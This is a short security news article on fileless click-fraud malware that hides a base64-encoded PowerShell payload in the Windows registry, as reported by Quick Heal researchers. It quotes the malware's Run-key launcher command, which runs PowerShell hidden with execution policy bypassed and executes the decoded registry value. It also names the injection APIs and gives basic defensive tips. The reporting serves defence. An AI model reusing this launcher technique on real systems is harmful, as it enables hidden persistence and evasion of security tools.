Malware

Fileless malware that uses PowerShell scripts from Window’s registry leading to Click Fraud Malware Campaign

Nowadays Hackers Distributing Advanced Fileless Malware with Evasion capabilities which are very Difficult to Detect. These types of malware sit in the system registry and making hard for Antivirus hard to identify the infection.

The security researchers from Quick Heal Security Labs detected as Fileless malware which uses PowerShell scripts stored in the windows registry.

Also read A Complete Fileless Malware “JS_POWMET” with Highly Sophisticated Evasion Technique

This malware has been distributed through a Click Fraud Malware Campaign from malicious Russian website ‘https://soplifan.ru”, in the further analysis they found it triggered in numerous computer at the same time and it resides on windows registry. They have published a detailed Technical analysis of malware in the runtime environment.

Malware found on the runtime entry HKCUSoftwareMicrosoftWindowsCurrentVersionRun{CLSID} and then it contains following codes to execute malware.

C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp ‘HKCU:SoftwareClassesHZMUQQOTHEK’).QJBBSZWJ)));

The malware uses ‘CreateRemoteThread’ and API such as, ‘VirtualAlloc’, ‘VirtualAllocEx’, ‘WriteProcessMemory’, and ‘ReadProcessMemory’ to do so.

To avoid interception script launched in non-interactive and bypass mode. Once executed malware maintains a continuous interaction with the domain and it leads to perform a Click Fraud Activity.

Malware injection Process

Common Defence’s to stay safe

  • Don’t open the attachments that you are not expecting.
  • Patch or Update your software.
  • Use a reputable security suite.
  • Download applications from Reputed sites.
  • Stay strict with CIA Cycle.
To Top

Pin It on Pinterest

Share This